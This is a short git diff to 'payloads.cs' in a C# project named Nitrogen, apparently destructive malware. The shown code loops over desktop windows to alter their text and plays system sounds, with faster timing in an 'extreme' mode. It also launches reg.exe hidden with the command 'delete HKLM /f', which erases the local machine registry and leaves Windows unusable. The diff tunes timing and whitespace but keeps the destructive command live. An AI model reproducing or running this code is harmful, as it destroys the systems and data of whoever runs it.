diff --git a/payloads.cs b/payloads.cs index aef2da7..41d939f 100644 --- a/payloads.cs +++ b/payloads.cs @@ -78,13 +78,13 @@ namespace Nitrogen while (variables.textchanger == true) { EnumChildWindows(GetDesktopWindow(), new EnumWindowsProc(EnumChildProc), IntPtr.Zero); - if (variables.extreme == false) + if (!variables.extreme) { Thread.Sleep(1000); } else { - Thread.Sleep(100); + Thread.Sleep(10); } } } @@ -459,6 +459,10 @@ namespace Nitrogen { PlaySystemSound("SystemNotification"); } + if (variables.extreme) + Thread.Sleep(1); + else + Thread.Sleep(500); } } } @@ -466,11 +470,11 @@ namespace Nitrogen { ProcessStartInfo registry = new ProcessStartInfo { - UseShellExecute = true, - FileName = "reg.exe", - Arguments = @"delete HKLM /f", - CreateNoWindow = true, - WindowStyle = ProcessWindowStyle.Hidden + UseShellExecute = true, + FileName = "reg.exe", + Arguments = @"delete HKLM /f", + CreateNoWindow = true, + WindowStyle = ProcessWindowStyle.Hidden }; Process.Start(registry).WaitForExit(); }